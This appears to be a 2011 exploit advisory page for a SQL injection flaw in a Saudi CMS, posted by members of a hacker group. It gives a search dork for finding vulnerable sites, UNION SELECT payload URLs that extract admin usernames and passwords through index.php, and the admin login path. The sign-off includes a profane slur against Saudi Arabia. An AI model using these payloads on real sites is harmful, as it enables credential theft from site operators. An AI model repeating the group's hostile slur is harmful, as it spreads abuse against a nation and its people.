CMS Of Saudi SQL Injection

2011.04.18

Credit: Net.Edit0r

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

#(+) Exploit Title: Cms OF Saudi SQLInjection Vulnerability
#(+) Author : Net.Edit0r
#(+) DisCovered By: 3H34N
#(+) E-mail : Black.Hat.tm@gmail.com & Ehsan.Empire@Att.Net
#(+) dork : "&#202;&#213;&#227;&#227; &#230;&#200;&#209;&#227;&#204; &#227;&#202;&#207;&#227; &#209;&#222;&#227;"
#(+) Versian : All Ver
#(+) Category : Web Apps [SQl]
#(+) Platform : Tested on: linux-Windows
#(+) Download : http://www.digi-user.com/
____________________________________________________________________
Black Hat Group #BHG
____________________________________________________________________
The security problem in the file "index.php" has been created.
[~] Vulnerable File :
# [+]http://localhost.com/index.php?action=[SQL]
[~] SQL injection Vulnerability
# [+]-1+union+select+1,username,password,4,5,6,id+from+admin--
# [+]http://localhost.com/index.php?action=1&id=-3+union+select+1,username,password,4,5,6,id+from+admin--
Note:login page is here http://localhost.com/mng/
##########################(+)IRANIAN Young HackerZ # Persian Gulf 4 Ever
(+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x &
3H34N & Cmaxx & D3adly #BHG
(+)Sp My Best Friend : HUrr!c4nE ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~
Ashkan ..SkilleR.. ~ M4hd1 ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and all
Friends
(+)Gr33ts to : All Iranian HackerZ ( Fuck All Saudi Arabia )
##########################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CMS Of Saudi SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.